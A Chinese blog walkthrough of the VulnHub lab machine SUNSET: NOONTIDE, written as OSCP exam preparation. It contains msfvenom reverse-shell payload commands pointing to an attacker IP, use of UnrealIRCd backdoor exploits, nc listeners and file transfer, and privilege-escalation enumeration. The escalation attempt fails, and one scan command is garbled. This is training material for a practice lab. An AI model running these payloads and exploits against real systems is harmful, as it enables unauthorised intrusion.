靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE

最新推荐文章于 2024-06-13 19:48:05 发布
最新推荐文章于 2024-06-13 19:48:05 发布
阅读量919 收藏 17
点赞数 19
文章标签: 网络 服务器 linux 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53721197/article/details/135564816
版权

打靶思路

  1. 资产发现

    1. 主机发现

    2. 服务发现

  2. 漏洞发现(获取权限)

    1. irc服务

  3. 提升权限

    1. server用户

      1. sudo

      2. suid

      3. cron

      4. 内核提权

      5. 信息收集

1、资产发现

1.1、主机发现

本次靶场SUNSET: NOONTIDE[1]指定IP,不涉及主机发现过程。

1.2、服务发现

使用命令sudo -u root 172.16.33.78 -n -Pn -p- --reason -sV -sC -O,发现主机开放的端口、提供的服务、使用的组件、组件的版本。

1885e3a4bc70dd94d2deb8327dc14a39.png

开放的端口

提供的服务

使用的组件

组件的版本

6667/tcp

irc

UnrealIRCd

?

6697/tcp

irc

UnrealIRCd

?

8067/tcp

irc

UnrealIRCd

?

-

os

?

?

2、漏洞发现(获取权限)

2.1、irc服务

0x01

主机只使用UnrealIRCd组件提供irc服务,看来要么从这突破,要么放弃。使用命令searchsploit UnrealIRCd,发现3.2.8.1版本的UnrealIRCd组件存在RCE漏洞。

e3255877233070932a635c4f061afbfc.png

查看Metasploitable2系列练习-漏洞利用之UnrealIRCd[2],得知可以使用hexchat查看UnrealIRCd组件的版本。使用命令sudo apt-get install -y hexchat安装hexchat,使用命令hexchat 172.16.33.78连接irc服务,发现UnrealIRCd组件的版本刚好就是存在RCE漏洞的3.2.8.1。

9f91fbe1c7bbfb68b6040aac701bf238.png

0x02

使用命令searchsploit -m 13853将EXP拷贝到当前目录。

ccde17f98eb293ff5e3dc0e9b9da7d14.png

使用命令msfvenom -p cmd/unix/reverse_perl LHOST=10.8.0.110 LPORT=4444 -f raw创建perl环境的Payload。

f48cf8f46eb800750adaab98bae4147f.png

使用命令vim 13853.pl将Payload添加到EXP中,注意引号的转义和结尾的分号。

b87bffb79278a203da377441ad76c534.png

使用命令nc -nvlp 4444监听反弹shell,使用命令perl 13853.pl 172.16.33.78 <端口> 1利用RCE漏洞发起反弹shell,均未获得反弹shell,难道目标机器上没有perl环境?

cdb1b420b11355a6c23cb45150adb1ea.png

0x03

使用命令msfvenom -p cmd/unix/reverse_bash LHOST=10.8.0.110 LPORT=4444 -f raw创建bash环境的Payload。

86d0e1d2f6ac0ed75c32bed62f7a9ea3.png

使用命令vim 13853.pl将Payload添加到EXP中,注意引号的转义和结尾的分号。

432c53f70f5a0d56d6f8334729b6c2a5.png

使用命令nc -nvlp 4444监听反弹shell,使用命令perl 13853.pl 172.16.33.78 <端口> 2利用RCE漏洞发起反弹shell,均未获得反弹shell,难道是EXP不行?

c465bcd5fc64dac60782e114df397ab8.png

0x04

网上找到EXPRanger11Danger/UnrealIRCd-3.2.8.1-Backdoor/exploit.py[3],使用命令vim exploit.py修改本地监听的IP和端口后,使用命令python3 exploit.py -payload <脚本语言> <目标IP> <目标端口>构造命令进行利用,最终使用python3 exploit.py -payload bash 172.16.33.78 6697成功获得反弹shell。

1fa6960578e8cec879b244202247e3b1.png

8e000d8e93fafd948edeeeb98603193e.png

d2d56c6cc09f9aa00666d106cd8958ea.png

0x05

网上找到EXPgeek-repo/UnrealIRCd-3.2.8.1/poc.py[4],使用命令vim poc.py修改源目IP端口后,构造命令python2 poc.py进行利用,最终成功获得server用户的反弹shell。

54d59f06a512b7d8c35dc339af5ab1fa.png

23205035558e9e197073a6c38fbe013e.png

fe3e4a2d896650e5ba7673009e49e4a6.png

3、提升权限

首先使用命令which pythonwhich python3发现有Python3环境,然后使用python3 -c 'import pty; pty.spawn("/bin/bash")'获得交换式shell。

0e3995c825f5d3d3b8dd6fd4083c65da.png

3.1、server用户

3.1.1、sudo

使用命令sudo -l查看当前用户能以谁的权限执行什么命令,发现不存在sudo命令。使用命令which sudo确认确实不存在。

029c262ff45caf54be48b380a1b3c3b0.png

3.1.2、suid

使用命令find / -perm -u=s -type f -ls 2>/dev/null查看哪些命令在执行时会以命令属主的权限执行,发现还挺多。逐个在GTFOBins[5]查询是否可用于提权,发现都不行。

9abf7224c2a188a42943ebc090022d20.png

3.1.3、cron

使用命令find /var/spool/cron/ -type f -ls 2>/dev/null查看定时任务,发现没有。使用命令find /var/spool/cron/ -type f -ls不隐藏报错,发现是没有查看权限。

4bf04fca60ebdbaf30bc7ef9f6fc5853.png

使用命令find /etc/*cron* -type f -ls查看定时任务,发现还挺多。使用命令find /etc/*cron* -type f -ls 2>/dev/null -exec cat {} \; > /tmp/cron.txtgrep '\*' /tmp/cron.txt查看定时任务内容,未发现有引用当前用户具有read和write权限的命令或脚本。

c3838ef374a3da20115186f95c5261d4.png

使用命令find / -perm -o=rw ! -path "/proc/*" -type f -ls 2>/dev/null查看other用户具有read和write权限的命令或脚本,发现有一些,但未发现有可能被定时任务引用的迹象。

519a4f09a28e4069f286dda391373e10.png

3.1.4、内核提权

使用命令uname -r获取系统内核版本4.19.0,使用命令cat /etc/*release获取系统发行版本Debian Linux 10

ffe6bbdd63152304f294c6220a175e7b.png

使用命令searchsploit 4. Debian Linux 10,未发现存在本地提权漏洞。

15034d852bb866d3d617765736378a00.png

3.1.5、信息收集

使用命令find /root/ -type f -ls 2>/dev/null查看特权用户目录下的文件,无收获。使用命令find /home/ ! -path "/home/server/irc/*" -type f -ls 2>/dev/null查看普通用户目录下的文件,无收获。使用命令find /tmp/ -type f -ls 2>/dev/null查看临时目录下的文件,无收获。

b5ad6be7fa8f3631d95768194f835f63.png

查看irc服务的配置文件和日志文件,最终在/home/server/irc/Unreal3.2/ircd.log中发现连接记录Connect - root!root@192.168.100.139,疑似获得账户密码root/root,不过使用命令su root切换到root账户时却报错,看来密码被改过了。但是查看WriteUp,确实又是使用账户密码root/root获得提权的,看来这靶机有问题呀。

6fff416f2a5529315fa3470dc5e24d67.png

f484723e50ea2d3f5f0e4f67cd957d64.png

3.1.6、使用工具

靶机使用命令nc -nvlp 4444 > /tmp/linpeas.sh接收文件,本地使用命令nc -nv 172.16.33.78 4444 < linpeas.sh发送文件后使用命令Ctrl+C关闭连接,靶机使用命令chmod +x /tmp/linpeas.sh赋予脚本执行权限后使用命令/tmp/linpeas.sh执行脚本。逐个查看脚本报告,未发现可以提权的漏洞,提权失败。

4871662ba17a7b6468d774f23c2585ae.png

13beb224f8a10edaf89d007999c3e306.png

d24292e9d4f0eb6cea02b57c6762d0ea.png

参考资料

[1]

SUNSET: NOONTIDE: https://www.vulnhub.com/entry/sunset-noontide,531/

[2]

Metasploitable2系列练习-漏洞利用之UnrealIRCd: https://chujian521.github.io/blog/2020/04/28/Metasploitable2系列练习-漏洞利用之UnrealIRCd/

[3]

Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor/exploit.py: https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor/blob/master/exploit.py

[4]

geek-repo/UnrealIRCd-3.2.8.1/poc.py: https://github.com/geek-repo/UnrealIRCd-3.2.8.1

[5]

GTFOBins: https://gtfobins.github.io

OneMoreThink
关注
  • 19
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
OSCP:OSCP考试材料
05-01
OSCP Linkedin: : 电子邮件:
Vulnstack红日安全内网域渗透靶场1实战
热门推荐
道阻且长,行则将至。
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网域信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
利用weevely生成php后门木马
qq_28147861的博客
01-18 3603
Weevely工具介绍 weevely 是一款具有高隐蔽性的针对PHP 平台的Web shell。它实现了SSH 风格的终端界面,并有大量自动化的模块。测试人员可用它执行系统指令、远程管理和渗透后期的自动渗透。下面是weevely的主要功能: (1)它有30多种可完成自动管理渗透后期任务的功能模块。这些模块能够:执行命令和浏览远程文件系统;检测常见的服务器配置问题;创造TCP shell和reverse shell;在被测主机上安装HTTP代理;利用目标主机进行端口扫描。 (2)使用HTTP Cook
红日靶场(一)
qq_58091216的博客
05-01 2962
红一1. 实验环境拓扑如下:2. 下载好镜像文件,下载地址:(13G,需要百度网盘会员)3.需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。添加网络设配器如下图将 Win7 的网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)而 Win2003、Win2008 网络适配器设置成VMnet1仅主机模式(内网)。网络配置完成,这三台虚拟主机默认开机密码都是。
HacktheBox靶场之Backdoor 核心提炼
weixin_51339377的博客
04-21 2133
自勉一句话:思维比工具更重要 内网靶场Backdoor 主要方向1:信息搜集(对目标的端口 服务 网站等进行扫描) nmap普通扫描 端口开放80和22 nmap进行全端口扫描 多出来一个1337 nmap -sS -sC -p- --min-rate=5000 10.10.11.125 nmap漏洞模块的扫描:发现后台登录地址 以及用户admin 这里学习到 一般wordpress的后台登录地址都是域名下的wp-login.php nikto扫描工具没有发现什么...
【安全练兵场】| BurpSuite靶场系列之SQL注入
Ms08067安全实验室
10-12 323
文章来源|MS08067 安全练兵场 知识星球本文作者:godunt(安全练兵场星球合伙人)玩靶场 认准安全练兵场成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响心态的同时却自叹不如。而安全练兵场是由理论知识到实战过渡的一道大门,安全练兵场星球鼓励大家从实战中...
OscpStudyGroup:OSCP研究小组
03-19
Oscp公益学习组(持续更新中……)一,学习组简介希望提供建立公益学习组帮助大家汇总学习资源,分享学习经验。官方网站二,学习资源整理三,其他资源参考0,OSCP命令大全: : 1,反弹壳方法汇总: : 2,linux提权...
OSCP:OSCP的东西
05-11
OSCP OSCP的东西 此仓库中的大多数内容仅供临时使用。 它的编码很差,但是可以完成工作... 我看到你们的人们开始盯着这个叉起来了……对您的警告:放弃所有希望,进入这里的你们…… 我目前正在对该Repo进行大修...
oscp:oscp的脚本
03-29
oscp
OSCP:OSCP注释和自动脚本
04-04
OSCP OSCP注释和自动脚本本指南是我本人在2021年使用oscp时编写的 如果您正在寻找有关如何利用特定计算机的信息,则可以在其他地方找到。 它仅包含一般性注释和脚本,以帮助某人加快使用工具和协议的速度。 剧本 ...
网络安全技术实验一 信息收集和漏洞扫描
zzzfff__的博客
06-09 963
了解信息搜集和漏洞扫描的一般步骤,利用Nmap等工具进行信息搜集并进行综合分析;掌握TCP全连接扫描、TCP SYN扫描的原理,利用Scapy编写网络应用程序,开发端口扫描功能模块;使用漏洞扫描工具发现漏洞并进行渗透测试。
Android WebSocket长连接的实现
Billy_Zuo的博客
06-12 1215
WebSocket 协议在2008年诞生,2011年成为国际标准。所有浏览器都已经支持了。它的最大特点就是,服务器可以主动向客户端推送信息,客户端也可以主动向服务器发送信息,是真正的双向平等对话,属于[“服务器推送技术”]的一种。WebSocket的特点包括:建立在 TCP 协议之上,服务器端的实现比较容易。与 HTTP 协议有着良好的兼容性。默认端口也是80和443,并且握手阶段采用 HTTP 协议,因此握手时不容易屏蔽,能通过各种 HTTP 代理服务器。支持双向通信,实时性更强。
htb_office
weixin_62621015的博客
06-08 1002
hack the box windows
Java网络通信实现
ty2587的博客
06-10 160
【代码】Java网络通信实现。
数据通信与网络
最新发布
weixin_74923758的博客
06-13 374
例如,TCP(Transmission Control Protocol)使用三次握手的过程来建立连接:发送方首先发送一个带有SYN标志的数据包给接收方,接收方收到后回复SYN和ACK标志的数据包,最后发送方回复一个带有ACK标志的数据包,确认连接建立,这样就可以确保双方都同意开始数据传输。中心节点是主节点,网络中的各个节点通过点到点的方式连接到一个中心节点上,再由中心节点向目的节点传输信息。所以,要先把信息用0,1比特的组合表示出来,再将0,1比特转换成特定的电流或电压,通过物理链路发送出去。
什么是蠕虫病毒?
wanhengwangluo的博客
06-13 287
蠕虫病毒是网络安全领域中的一大威胁,蠕虫病毒有着极强的隐蔽性,传播速度十分快,有着极强的破坏力,会给企业正常运转的业务带来巨大的挑战,为了能够有效的应对蠕虫病毒,企业采取了一系列的技术性措施,构建一个多层次、全方位的防护体系来进行抵御蠕虫病毒。蠕虫病毒是一种常见的计算机病毒,会利用网络来进行复制和传播,它的传染途径是主要通过网络和电子邮件,蠕虫病毒和一般的病毒是不同的,它不需要附着在宿主程序当中,一般是通过端口漏洞来进行传播的。
软考初级网络管理员_07_网络单选题
2301_80961833的博客
06-12 734
部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了169.254.0.0范围内的地址。部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了127.254.0.0范围内的地址。通过ARP协议可以获取目的端的MAC地址和UUID的地址。你必须先接入Internet,别人才可以给你发送电子邮件。只要你的E-Mai 地址有效,别人就可以给你发送电子邮件。你只有打开了自己的计算机,别人才可以给你发送电子邮件。关于虚拟局域网,下面的描述中错误的是()。
HCIA-设备管理+路由基础
yasinawolaopo的博客
06-11 129
它是由linux进行修改的,目前路由上使用的最多的是VRP5,VRP涉及到防火墙,路由器等。VRP8一般会使用在数据中心级,运营商级别的网络它们相对版本会高一些,支持的性能会更高也是最吃资源的。不建议大家改成中午,因为真机情况下是不支持中午的。eNSP使用的是v2box虚拟机。以华为的eNSP为例。
cs61C | lecture4
DaphneOdera17的博客
06-10 660
## Stack在最顶部,向下增长。包含局部变量和 function frame information。栈指针(SP, Stack Pointer) 告诉我们最低(当前)stack frame 在哪里。当进程结束时,SP 会移动回之前的位置,但是数据会保留(现在变成 garbage)。```ca(0);return 1;b(1);c(2);d(4);```!!以下错误代码:```cint y;y = 3;return &y;/* 3 *//*?*/
oscp relia
12-21
OSCP(Offensive Security Certified...持有OSCP认证的渗透测试专业人员不仅拥有丰富的实战经验,还能够为企业提供专业、高效的安全防御与风险管理服务。因此,OSCP认证在当前信息安全行业中拥有非常重要的地位和价值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值